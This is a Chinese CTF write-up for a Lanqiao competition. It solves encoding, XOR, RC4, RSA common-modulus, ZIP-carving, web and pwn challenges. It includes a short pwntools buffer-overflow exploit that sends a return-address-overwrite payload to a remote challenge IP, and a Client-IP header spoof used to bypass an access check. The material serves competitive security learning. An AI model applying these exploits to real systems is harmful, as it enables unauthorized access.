蓝桥WP
CyberChef
可以看出是先将flag base64加密一下然后ROT13加密
先手动爆破出ROT13得ZmxhZ3tkY2I3N2FiYy02NDQ1LTQ4NDAtYmJjYS01MjUyZjYwNzM1ZTd9
然后base64解密得flagflag{dcb77abc-6445-4840-bbca-5252f60735e7}
XOR
IDA64 打开,一眼小端序和循环异或
key为SEcRET7
,写个脚本
flagflag{a83ee6c1-2296-4d3e-9d3c-42604f76f7d5}
exp
key = 'SEcRET7'
len = len(key)
s2 = [0x35, 0x29, 0x02, 0x35, 0x3E, 0x35, 0x0F, 0x60,
0x20, 0x06, 0x64, 0x26, 0x65, 0x1A, 0x61, 0x77,
0x5A, 0x64, 0x68, 0x60, 0x53, 0x60, 0x20, 0x4E,
0x6B, 0x21, 0x67, 0x54, 0x7E, 0x71, 0x51, 0x64,
0x75, 0x60, 0x51, 0x64, 0x73, 0x05, 0x65, 0x21, 0x61, 0x4A]
flag = ''
for i in range(42):
flag += chr(s2[i] ^ ord(key[i % len]))
print(flag)
RC4
ida32 打开
RC4 直接梭
flagflag{c8fd99f1-841a-44c9-8d38-746db6ff95c1}
栈溢出
IDA64 打开可以看到是一个明显的gets命令,正常的栈溢出漏洞
exp
from pwn import *
p = remote('47.94.96.185', 31152)
payload = b'a'*0x28+p64(0x4011B1)
p.sendline(payload)
p.interactive()
flagflag{21c601fb-fc07-44ee-afad-cf9a2ee36c50}
禁止访问
bp抓包
client-ip修改一下
flagflag{9d7d20d5-03e5-443e-b29f-b64fd6610fc6}
RSA
有个模板题RSA,写个脚本解决,c1,c2带进去就行了
from Crypto.Util.number import bytes_to_long
import gmpy2
import binascii
import random
random.seed(123456)
e1 = random.randint(100000000, 999999999)
n = 7265521127830448713067411832186939510560957540642195787738901620268897564963900603849624938868472135068795683478994264434459545615489055678687748127470957
c1 = 3315026215410356401822612597933850774333471554653501609476726308255829187036771889305156951657972976515685121382853979526632479380900600042319433533497363
c2 = 1188105647021006315444157379624581671965264301631019818847700108837497109352704297426176854648450245702004723738154094931880004264638539450721642553435120
e2 = 65537
s = gmpy2.gcdext(e1,e2)# 扩展欧几里得算法
m1 = gmpy2.powmod(c1,s[1],n)
m2 = gmpy2.powmod(c2,s[2],n)
m = (m1*m2)%n
print(binascii.unhexlify(hex(m)[2:]))
#b'flag{359a1693-7bce-4fbc-87fa-111cdffaa0e8}'
ZIP
分析数据,发现flag.zip
收缩压缩包头部和尾部特征值504B
找到压缩包位置
将压缩包部分新建一个010的文件
然后根据提示爆破得到flag
本文来自博客园,作者:{Tree_24},转载请注明原文链接:{https://www.cnblogs.com/Tree-24/}